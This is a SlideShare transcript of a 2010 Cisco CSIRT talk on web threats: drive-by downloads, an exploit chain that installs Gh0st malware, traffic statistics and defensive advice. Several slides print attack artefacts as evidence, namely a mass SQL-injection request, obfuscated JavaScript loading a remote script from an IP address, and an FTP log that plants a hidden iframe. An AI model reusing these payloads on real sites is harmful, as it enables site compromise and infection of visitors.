SlideShare une entreprise Scribd logo
1  sur  44
Télécharger pour lire hors ligne
A Study on the State of
Web Security
Henry Stern
Security Investigator
Cisco CSIRT


© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   1
1.  Hacked While Browsing
2.  Web Exploit Architecture
3.  The Study
4.  Securing your Clients and Servers




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   2
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   3
4
    © 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   4
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   5
6
© 2010 Cisco and/or its affiliates. All rights reserved.       Cisco Public   6
•  Let’s see what’s
                                                            happening behind the
                                                            scenes




© 2010 Cisco and/or its affiliates. All rights reserved.                         Cisco Public   7
How does a Web Page Work?
            HTML: Web site “recipe.”
            Initial HTML retrieval provides
            “recipe”.
            Browser then fetches
            all objects listed in initial
            HTML “recipe”.
            Web Resources:
            The actual ingredients.
            Retrieved, per the HTML, from
            any specified location. Includes
                     Images
                     Scripts
                     Executable objects (“plug-ins”)
                     Other web pages




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   8
•  URLs in browser: 1

                                                           •  HTTP Gets: 162
                                                           •  Images: 66
                                                             from 18 domains including
                                                             5 separate 1x1 pixel invisible
                                                             tracking images


                                                           •  Scripts: 87 from 7 domains

                                                           •  Cookies: 118 from
                                                             15 domains

                                                           •  8 Flash objects from
                                                             4 domains




© 2010 Cisco and/or its affiliates. All rights reserved.                                      Cisco Public   9
•  Web page HTML is
                                                            the recipe
                                                           •  Code snippets are web
                                                            site ingredients
                                                           •  The browser will fetch
                                                            each ingredient
                                                           •  Each ingredient
                                                            initiates a HTTP
                                                            transaction




© 2010 Cisco and/or its affiliates. All rights reserved.                        Cisco Public   10
•  “Application Vulnerabilities Exceed OS Vulnerabilities”

•  IE and Firefox vulnerable

•  “…hundreds of vulnerabilities in ActiveX controls installed by
       software vendors have been discovered.”




                  Sources: SANS Top Cyber Security Risks 2007, 2009
                  http://www.sans.org/top-cyber-security-risks/




© 2010 Cisco and/or its affiliates. All rights reserved.              Cisco Public   11
•  Quicktime, Java, Flash, Reader, DirectX

 •  Explosion of Browser Helper Objects and
        third-party plug-ins
 •  Plug-ins are installed (semi) transparently by website. Users
        unaware an at-risk helper object or plug-in is installed …
        introducing more avenues for hackers to exploit users visiting
        malicious web sites.




12
 © 2010 Cisco and/or its affiliates. All rights reserved.            Cisco Public   12
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   13
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   14
•  brookeseidl.com registered at eNom 2002

•  63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains




               Script injected onto web page – one extra ingredient!



© 2010 Cisco and/or its affiliates. All rights reserved.               Cisco Public   15
•  Browser fetches h.js javascript from tejary.net

•  Tejary.net registered 2003 at GoDaddy and hosted on
       68.178.160.68 in Arizona
•  Registered by Aljuraid, Mr Nassir A in Saudi Arabia

•  Tejary.net/h.js calls two remote iframe objects




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   16
•  V3i9.cn registered at                                   by   On
       3/25/09. DNS by mysuperdns.com
•  Hosted on 216.245.201.208 at Limestone Networks in
       Dallas, TX
•  Fetched objects include
            ipp.htm, real.html, real.js
            14.htm, 14.Js
            flash.htm, igg.htm




© 2010 Cisco and/or its affiliates. All rights reserved.        Cisco Public   17
It all starts with /c.htm loaded from tejary.net, said7.com
Real Player Exploit
•  /ipp.htm – Real Player exploit CVE-2008-1309
•  2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky



•  /real.htm, /real.js – Real Player exploit CVE-2007-5601




MDAC (Microsoft Data Access Component) Exploit
•  /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions

Flash Exploit
•  /swfobject.js – detects flash version and selects according content
•  /flash.htm – Flash exploit. 2/40 anti-virus vendors detect
•  /igg.htm - ??? Called from /flash.htm for exploit?




© 2010 Cisco and/or its affiliates. All rights reserved.                             Cisco Public   18
•  After successful exploit,
       malware installed from v3i9.cn


•  ce.exe = Gh0st malware

       Keylogging, web cam monitoring
       Persistent connection to China:
       58.253.68.68 vobe.3322.org




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   19
“…Criminals have used the Internet
                                                           to steal more than $100 million
                                                           from U.S. banks so far this year
                                                           and they did it without ever having
                                                           to draw a gun or pass a note to a
                                                           teller…

                                                           …I've seen attacks where there's
                                                           been $10 million lost in one
                                                           24-hour period.”


                                                           -Shawn Henry
                                                           FBI Assistant Director, Cyber Division
                                                           8 Nov 2010 CBS “60 Minutes”
© 2010 Cisco and/or its affiliates. All rights reserved.                                      Cisco Public   20
•  Ce.exe analyzed
                     on Virus Total


                     31% detection on days 1, 2



                     48% detection on day 3


              •  21% detection for
                     SMS.exe




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   21
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   22
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   23
“By enticing a user to visit a
       maliciously crafted web page,
         an attacker may trigger the
          issue, which may lead to
          arbitrary code execution.”


© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   24
•  Lots of legitimate web surfing.

•  Our enterprise customers each request millions of pages per day.

•  Miscreants tap in to legitimate traffic.

•  Advantages:
            You don’t have to create new things.
            Piggyback on sites’ reputation, page rank.

•  Risk proportional to reward.




© 2010 Cisco and/or its affiliates. All rights reserved.      Cisco Public   25
•  Infected thousands of
       websites with vulnerable
       ASP and Cold Fusion pages
       and MSSQL database.
•  Infections persist to this day!

•  How? Google hacking + run
       on anyPOST /somefile.asp ID=123;DECLARE%20@S
               schema SQL
       injection.
                %20NVARCHAR(4000);SET%20@S=CAST
                   (0x4400450043004C004 … 0073006F007200%20AS
                          %20NVARCHAR(4000));EXEC(@S);




© 2010 Cisco and/or its affiliates. All rights reserved.    Cisco Public   26
•  Victims infected with info stealer by drive-by download.

•  Steals FTP credentials from victims.

•  Obfuscated javascript code is inserted into any file that contains a
       <body> tag.
•  New victims are infected through victim’s own website.

•  Infected sites were de-listed by Google.

       document.write(unescape(‘Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI
       %2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E
                       <script src=//94.247.2.195/jquery.js></script>
        %3CDp%2Fsc30cri4Ppc30tDp%3E’).replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/
                                           g,""));



© 2010 Cisco and/or its affiliates. All rights reserved.               Cisco Public   27
[SOCKS 5 header]
USER victim
PASS a 9-digit secure random password
PASV
TYPE I
RETR //public_html/forum/db/index.htm
PASV
<iframe src="http://activeware.cn/ind.php" width="1" height="1"
TYPE I               alt="YTREWQhej2Htyu"
STOR style="visibility:hidden;position:absolute”></iframe>
      //public_html/forum/db/index.htm
QUIT
         Source: Christian Kreibich at ICSI Berkeley




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   28
•  Whole website with
       aggressive SEO uploaded
       to compromised host.
•  Hotlinks to images on
       legitimate websites.
•  GIS queries send users to
       SEO site instead of image
       host.
•  Links to drive-by
       download.



© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   29
30
© 2010 Cisco and/or its affiliates. All rights reserved.        Cisco Public   30
•  Malicious banner ads unknowingly served by Google and
       Microsoft.




•  Caused a drive-by download.

•  ScanSafe: 10% of hits via Hotmail.
                                                 Adshufffle.com
•  Installed fake AV.




© 2010 Cisco and/or its affiliates. All rights reserved.          Cisco Public   31
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   32
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   33
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   34
•  Phone-home data from thousands of IronPort web proxies.

•  Anonymized traffic summaries.

•  Web reputation: Bad, Neutral and Good.
            Default actions: Block, scan, allow.
            Plus content policies.

•  Randomly sampled 1 billion clicks from pool of 3 trillion.

•  Used actual action taken by the appliance.




© 2010 Cisco and/or its affiliates. All rights reserved.        Cisco Public   35
Bad; 1%


                                                           Good; 14%


                                                                                  93% Blocked
                                 1% Blocked




                                                                       Neutral; 85%

                                 3% Blocked




© 2010 Cisco and/or its affiliates. All rights reserved.                                        Cisco Public   36
Flash; 2% Other; 9%
                                          CSS; 3% Zip; 0%

                                                    XML; 3%

                                       Binary; 3%
                                      Video; 5%
                                                                                Image; 45%

                                                           Javascript;
                                                              13%


                                                                    HTML; 17%




© 2010 Cisco and/or its affiliates. All rights reserved.                                     Cisco Public   37
0.90%
                                                  0.80%
          0.80%
          0.70%
          0.60%
          0.50%
          0.40%
          0.30%
                                                           0.20%                   0.17%
          0.20%
                                                                   0.08%   0.07%
          0.10%
          0.00%
                                            Javascript     Flash   PDF     Image   Binary


© 2010 Cisco and/or its affiliates. All rights reserved.                              Cisco Public   38
Good: 5%




                                                                             Bad: 21%




                                                           Neutral: 74%




© 2010 Cisco and/or its affiliates. All rights reserved.                                Cisco Public   39
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   40
•  Users
            Targeted training designed to defend against social engineering.

•  Host-level
            Patch browser and applications.
            Audit all applications and files on desktops.
            “Lock down” hosts where applicable.

•  Network-level security
            Reputation and content scanning for all web objects.
            Secure HTTPS.
            Usability vs. security: block objects not pages.
            Active detection of infected users.




© 2010 Cisco and/or its affiliates. All rights reserved.                       Cisco Public   41
•  Secure web application development (OWASP).

•  Vulnerability assessment before deployment.

•  Regular penetration testing.

•  Monitor site security and integrity.

•  Pay attention to third-party software.

•  Consider Web Application Firewall.

•  Outbound scanning with AV/Safe Browsing.

•  Two-factor authentication.

•  IP-based access controls.


© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   42
•  Compliance and auditing.

•  Security posture.

•  Third-party integration.

•  Secondary usage of data.

•  Geographical affinity.

•  Incident reporting.




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   43
Thank you.

Contenu connexe

Similaire à A Study on the State of Web Security

HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
What is Cryptojacking and How Can I Protect Myself?
What is Cryptojacking and How Can I Protect Myself?What is Cryptojacking and How Can I Protect Myself?
What is Cryptojacking and How Can I Protect Myself?Global Knowledge Training
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensionsZoltan Balazs
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
Browser Compete - IE8 FireStarter
Browser Compete - IE8 FireStarterBrowser Compete - IE8 FireStarter
Browser Compete - IE8 FireStarterMithun T. Dhar
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012Zoltan Balazs
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Julia Yu-Chin Cheng
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareMyNOG
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
Codestrong 2012 breakout session introduction to mobile web and best practices
Codestrong 2012 breakout session   introduction to mobile web and best practicesCodestrong 2012 breakout session   introduction to mobile web and best practices
Codestrong 2012 breakout session introduction to mobile web and best practicesAxway Appcelerator
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsCisco DevNet
 
Beyond the 'cript practical i os reverse engineering lascon
Beyond the 'cript  practical i os reverse engineering lasconBeyond the 'cript  practical i os reverse engineering lascon
Beyond the 'cript practical i os reverse engineering lasconNino Ho
 
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...Codemotion
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2Gaurav Srivastav
 
BSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
BSides Rochester 2018: Anthony DiDonato: Virtualization Based SecurityBSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
BSides Rochester 2018: Anthony DiDonato: Virtualization Based SecurityJosephTesta9
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockownerkhan
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 

Similaire à A Study on the State of Web Security (20)

HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
 
Webinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for DevelopersWebinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for Developers
 
What is Cryptojacking and How Can I Protect Myself?
What is Cryptojacking and How Can I Protect Myself?What is Cryptojacking and How Can I Protect Myself?
What is Cryptojacking and How Can I Protect Myself?
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
Browser Compete - IE8 FireStarter
Browser Compete - IE8 FireStarterBrowser Compete - IE8 FireStarter
Browser Compete - IE8 FireStarter
 
Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
Codestrong 2012 breakout session introduction to mobile web and best practices
Codestrong 2012 breakout session   introduction to mobile web and best practicesCodestrong 2012 breakout session   introduction to mobile web and best practices
Codestrong 2012 breakout session introduction to mobile web and best practices
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat bots
 
Beyond the 'cript practical i os reverse engineering lascon
Beyond the 'cript  practical i os reverse engineering lasconBeyond the 'cript  practical i os reverse engineering lascon
Beyond the 'cript practical i os reverse engineering lascon
 
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
 
BSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
BSides Rochester 2018: Anthony DiDonato: Virtualization Based SecurityBSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
BSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknock
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 

Plus de Cisco Canada

Cisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco Canada
 
Cisco connect montreal 2018 iot demo kinetic fr
Cisco connect montreal 2018   iot demo kinetic frCisco connect montreal 2018   iot demo kinetic fr
Cisco connect montreal 2018 iot demo kinetic frCisco Canada
 
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco Canada
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dcCisco Canada
 
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018   enterprise networks - say goodbye to vla nsCisco connect montreal 2018   enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018 enterprise networks - say goodbye to vla nsCisco Canada
 
Cisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco Canada
 
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Canada
 
Cisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco Canada
 
Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Cisco Canada
 
Cisco connect montreal 2018 compute v final
Cisco connect montreal 2018   compute v finalCisco connect montreal 2018   compute v final
Cisco connect montreal 2018 compute v finalCisco Canada
 
Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco Canada
 
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco Canada
 
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...Cisco Canada
 
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
Cisco Connect Toronto 2018   an introduction to Cisco kineticCisco Connect Toronto 2018   an introduction to Cisco kinetic
Cisco Connect Toronto 2018 an introduction to Cisco kineticCisco Canada
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...Cisco Canada
 
Cisco Connect Toronto 2018 DevNet Overview
Cisco Connect Toronto 2018  DevNet OverviewCisco Connect Toronto 2018  DevNet Overview
Cisco Connect Toronto 2018 DevNet OverviewCisco Canada
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018  DNA assuranceCisco Connect Toronto 2018  DNA assurance
Cisco Connect Toronto 2018 DNA assuranceCisco Canada
 
Cisco Connect Toronto 2018 network-slicing
Cisco Connect Toronto 2018   network-slicingCisco Connect Toronto 2018   network-slicing
Cisco Connect Toronto 2018 network-slicingCisco Canada
 
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
Cisco Connect Toronto 2018   the intelligent network with cisco merakiCisco Connect Toronto 2018   the intelligent network with cisco meraki
Cisco Connect Toronto 2018 the intelligent network with cisco merakiCisco Canada
 
Cisco Connect Toronto 2018 sixty to zero
Cisco Connect Toronto 2018   sixty to zeroCisco Connect Toronto 2018   sixty to zero
Cisco Connect Toronto 2018 sixty to zeroCisco Canada
 

Plus de Cisco Canada (20)

Cisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devops
 
Cisco connect montreal 2018 iot demo kinetic fr
Cisco connect montreal 2018   iot demo kinetic frCisco connect montreal 2018   iot demo kinetic fr
Cisco connect montreal 2018 iot demo kinetic fr
 
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dc
 
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018   enterprise networks - say goodbye to vla nsCisco connect montreal 2018   enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
 
Cisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse locale
 
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
 
Cisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybrides
 
Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018
 
Cisco connect montreal 2018 compute v final
Cisco connect montreal 2018   compute v finalCisco connect montreal 2018   compute v final
Cisco connect montreal 2018 compute v final
 
Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2
 
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
 
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
 
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
Cisco Connect Toronto 2018   an introduction to Cisco kineticCisco Connect Toronto 2018   an introduction to Cisco kinetic
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
 
Cisco Connect Toronto 2018 DevNet Overview
Cisco Connect Toronto 2018  DevNet OverviewCisco Connect Toronto 2018  DevNet Overview
Cisco Connect Toronto 2018 DevNet Overview
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018  DNA assuranceCisco Connect Toronto 2018  DNA assurance
Cisco Connect Toronto 2018 DNA assurance
 
Cisco Connect Toronto 2018 network-slicing
Cisco Connect Toronto 2018   network-slicingCisco Connect Toronto 2018   network-slicing
Cisco Connect Toronto 2018 network-slicing
 
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
Cisco Connect Toronto 2018   the intelligent network with cisco merakiCisco Connect Toronto 2018   the intelligent network with cisco meraki
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
 
Cisco Connect Toronto 2018 sixty to zero
Cisco Connect Toronto 2018   sixty to zeroCisco Connect Toronto 2018   sixty to zero
Cisco Connect Toronto 2018 sixty to zero
 

Dernier

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
